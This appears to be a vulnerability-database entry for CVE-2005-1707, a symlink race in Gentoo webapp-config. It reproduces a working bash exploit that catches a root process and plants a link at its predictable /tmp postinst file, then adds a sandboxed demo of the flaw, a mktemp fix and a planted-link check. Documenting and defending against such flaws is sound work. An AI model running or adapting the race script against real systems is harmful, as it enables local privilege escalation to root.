Gentoo Webapp-Config Insecure File Creation Vulnerability


Vulnerability ID: 1108811
Vulnerability type: Design error
Published: 2005-05-26
Updated: 2005-10-20
CVE ID: CVE-2005-1707
CNNVD-ID: CNNVD-200505-1183
Platform: Linux
CVSS score: 4.6
|Vulnerability source
https://www.exploit-db.com/exploits/25709
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1183
|Vulnerability details
The fn_show_postinst function in Gentoo webapp-config before 1.10-r14 allows local users to overwrite arbitrary files via a symlink attack on the postinst.txt temporary file.
|Exploit
source: http://www.securityfocus.com/bid/13780/info

Gentoo webapp-config is prone to an insecure file creation vulnerability. This issue is due to a design error that causes the application to fail to verify the existence of a file before writing to it.

An attacker may leverage this issue to cause arbitrary shell commands to be executed with superuser privileges. 

#!/bin/bash

# Eric Romang aka wow ([email protected])
# webapp-config race condition that permits execution of arbitrary commands with root privileges
# works with webapp-config < 1.10-r14

rm -f webapp-config_trace.txt fake_tmp_file /tmp/*.postinst.txt
touch ~/fake_tmp_file

echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting for webapp-config execution..."

while [ "$status" == 0 ]
do
	ps auxw|grep webapp-config|grep root 
	if [ "$?" == 0 ]
	then
		echo "1" > webapp-config_trace.txt
	fi
	status=`cat webapp-config_trace.txt`
done

echo "Process caught !"
process_id=`pgrep -u root webapp-config`
ln -s ~/fake_tmp_file /tmp/$process_id.postinst.txt
echo "fake_file_created!"
echo "we force the file to be overwritten"

echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting the end of webapp-config"
echo "during all the configuration we force the file to be overwritten"
while [ "$status" == 0 ]
do
	ps auxw|grep webapp-config|grep root
	if [ "$?" == 1 ]
	then
		echo "1" > webapp-config_trace.txt
	else
		echo "echo premature end of script; exit 1;" > ~/fake_tmp_file
	fi
	status=`cat webapp-config_trace.txt`
done
echo "end of webapp-config"
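
Added example (not webapp-config's code and not part of the original advisory): the write pattern the script above races, a PID-derived name like its /tmp/$process_id.postinst.txt path opened with a plain redirect, shown next to a mktemp-based replacement and a check for planted links. The sandbox layout, function names and sample text are constructed for illustration.

```shell
#!/bin/bash
# Constructed demo: everything happens inside a private sandbox directory.

# Pattern from the advisory: a PID-derived name in a shared directory,
# opened with a plain redirect that follows any link already at that path.
write_predictable() {            # $1 = shared tmp dir, $2 = text
    echo "$2" > "$1/$$.postinst.txt"
}

# Hardened form: mktemp picks an unpredictable name and creates the file
# exclusively (O_CREAT|O_EXCL, mode 0600), so a planted link is never followed.
write_hardened() {               # $1 = tmp dir, $2 = text; prints the new path
    local f
    f=$(mktemp "$1/postinst.XXXXXXXXXX") || return 1
    echo "$2" > "$f"
    echo "$f"
}

# Defender check: list symlinks squatting on *.postinst.txt names in a dir.
find_planted_links() {           # $1 = directory to inspect
    find "$1" -maxdepth 1 -type l -name '*.postinst.txt'
}

# Runs both writers against a pre-planted link and reports the content of the
# file the link points at after each write.
demo() {
    local box victim out
    box=$(mktemp -d) || return 1
    mkdir "$box/tmp"
    victim="$box/protected.conf"
    echo "original" > "$victim"
    ln -s "$victim" "$box/tmp/$$.postinst.txt"   # stands in for the planted link

    write_hardened "$box/tmp" "postinst-text" > /dev/null
    out="hardened=$(cat "$victim")"
    write_predictable "$box/tmp" "postinst-text"
    out="$out predictable=$(cat "$victim")"
    out="$out links=$(find_planted_links "$box/tmp" | wc -l | tr -d ' ')"
    rm -rf "$box"
    echo "$out"
}

demo
```

Testing for a link with `[ -L path ]` before writing is not a substitute for exclusive creation, because the link can appear between the test and the open.
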
|References

Source: SECTRACK
Name: 1014027
Link: http://securitytracker.com/id?1014027
Source: MISC
Link: http://www.zataz.net/adviso/webapp-config-05182005.txt
Source: BID
Name: 13780
Link: http://www.securityfocus.com/bid/13780
Source: OSVDB
Name: 16746
Link: http://www.osvdb.org/16746
Source: GENTOO
Name: GLSA-200506-13
Link: http://www.gentoo.org/security/en/glsa/glsa-200506-13.xml
Source: VUPEN
Name: ADV-2005-0809
Link: http://www.frsirt.com/english/advisories/2005/0809
Source: SECUNIA
Name: 15445
Link: http://secunia.com/advisories/15445
Source: MISC
Link: http://bugs.gentoo.org/show_bug.cgi?id=91785
